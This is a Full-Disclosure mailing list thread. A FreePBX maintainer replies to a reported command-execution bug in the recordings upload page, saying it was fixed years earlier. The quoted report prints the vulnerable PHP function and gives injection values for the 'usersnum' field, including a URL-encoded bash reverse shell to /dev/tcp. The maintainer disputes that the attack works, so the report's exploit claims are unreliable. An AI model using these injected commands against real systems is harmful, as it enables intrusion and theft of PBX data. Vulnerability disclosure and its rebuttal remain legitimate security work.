Re: Freepbx 2.x , Command Execution vuln

[Rob Thomas <rob.thomas () schmoozecom com>]

Just a quick note. As I previously said, we have security () freepbx org,
and we do care deeply about security issues in both FreePBX and
FreePBX Distro.  If you're uncomfortable sending an email to there,
you can also send issues to my personal email address (which isn't
hard to find), with the word 'security' in the topic, which
automatically flags it as important.

I appreciate the report, however, it turns out that the issue here was
fixed in FreePBX 2.3, about 3 and a half years ago. Specifically, svn
http://www.freepbx.org/trac/changeset/10299, which was addressed in
FreePBX Ticket 4550 - http://issues.freepbx.org/browse/FREEPBX-4550

I did try manually duplicating it, and I couldn't find a away to avoid
the ctype_digit check, which blocked this specific attack.

I'm happy to take this off-list if you think I've mis-understood.

--Rob Thomas

On Mon, Feb 24, 2014 at 1:09 AM, 0u7 5m4r7 <n0p1337 () gmail com> wrote:
> App : Freepbx 2.x
> Download : schmoozecom.net
> Auther : i-Hmx
> Mail : n0p1337 () gmail com
> Home : security arrays inc. , sec4ever.com , exploit4arab.net
>
> And again , while the distro is widely user , Schmoozecom staff not giving
> it enough attention ,
> all they provided for the distro is adding the schmoozecom fancy logo and
> "Developed by schmoozecom" Teraraa :/
> What ever,
> Freepbx suffer from another command execution vuln , not so critical but
> perhaps many people gonna be interested abt it
> as it can be used to dump plaintext data from the PBX Box ;)
>
> Vulnerable function "recording_addpage" @
> admin/modules/recordings/page.recordings.php
>
> function recording_addpage($usersnum) {
>     global $fc_save;
>     global $fc_check;
>     global $recordings_save_path;
>
>     ?>
>     <div class="content">
>     <h2><?php echo _("System Recordings")?></h2>
>     <h3><?php echo _("Add Recording") ?></h3>
>     <h5><?php echo _("Step 1: Record or upload")?></h5>
>     <?php if (!empty($usersnum)) {
>     echo '<p>';
>         echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
> dial")."&nbsp;".$fc_save." <span>";
>         echo _("Start speaking at the tone. Press # when
> finished.")."</span></a>";
>         echo _("and speak the message you wish to record. Press # when
> finished.")."\n";
>     echo '</p>';
>     } else { ?>
>         <form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
> method="post">
>         <input type="hidden" name="display" value="recordings">
>         <?php
>         echo _("If you wish to make and verify recordings from your phone,
> please enter your extension number here:"); ?>
>         <input type="text" size="6" name="usersnum" tabindex="<?php echo
> ++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
> _("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
>         </form>
>     <?php } ?>
>   <p></p>
>     <form enctype="multipart/form-data" name="upload" action="<?php echo
> $_SERVER['PHP_SELF'] ?>" method="POST">
>         <?php echo _("Alternatively, upload a recording in any supported
> asterisk format. Note that if you're using .wav, (eg, recorded with
> Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
> 8000Hz")?>:<br>
>         <input type="hidden" name="display" value="recordings">
>         <input type="hidden" name="action" value="recordings_start">
>                 <input type="hidden" name="usersnum" value="<?php echo
> $usersnum ?>">
>         <input type="file" name="ivrfile" tabindex="<?php echo
> ++$tabindex;?>"/>
>         <input type="button" value="<?php echo _("Upload")?>"
> onclick="document.upload.submit(upload);alert('<?php echo
> addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
> echo ++$tabindex;?>"/>
>     </form>
>     <?php
>     if (isset($_FILES['ivrfile']['tmp_name']) &&
> is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
>     if (empty($usersnum) || !ctype_digit($usersnum)) {
>             $dest = "unnumbered-";
>         } else {
>             $dest = "{$usersnum}-";
>         }
>         $suffix =
> preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'],
> "."), 1));
>         $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
>         move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
>         system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
> $destfilename);
>         system("chmod g+rw ".$destfilename);
>         echo "<h6>"._("Successfully uploaded")."
> ".$_FILES['ivrfile']['name']."</h6>";
>         $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
>     } ?>
>     <form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>" method="post"
> onsubmit="return rec_onsubmit();">
>     <input type="hidden" name="action" value="recorded">
>     <input type="hidden" name="display" value="recordings">
>     <input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
>     <?php
>     if (!empty($usersnum)) { ?>
>         <h5><?php echo _("Step 2: Verify")?></h5>
>         <p> <?php echo _("After recording or
> uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to listen
> to your recording.")?> </p>
>         <p> <?php echo _("If you wish to re-record your message,
> dial")."&nbsp;".$fc_save; ?></p>
>         <h5><?php echo _("Step 3: Name")?> </h5> <?php
>     } else {
>         echo "<h5>"._("Step 2: Name")."</h5>";
>     } ?>
>     <table style="text-align:right;">
>         <tr valign="top">
>             <td valign="top"><?php echo _("Name this Recording")?>: </td>
>             <td style="text-align:left"><input type="text" name="rname"
> value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>
>         </tr>
>     </table>
>
>     <h6><?php
>     echo _("Click \"SAVE\" when you are satisfied with your recording");
>     echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
>     <input name="Submit" type="submit" value="<?php echo _("Save")?>"
> tabindex="<?php echo ++$tabindex;?>"></h6>
>     <?php recordings_form_jscript(); ?>
>     </form>
>     </div>
> <?php
> }
>
> Actually as you can see there are many exploitable lines there , but here am
> interested about this line
> system("chmod g+rw ".$destfilename);
> if you traced the function flow you will notice that 'destfilename' get part
> of his value from the parameter $_REQUEST['usersnum']
> the function is called via
> Target/admin/config.php?type=setup&display=recordings
> before uploading open firebug
> search for usersnum
> edit value to
> fa;id>faris;fax
> or , for backconnetion use
> fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
> and you are ready to dominate , or even make some $$ if you r interested ;)
> Have a good day
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/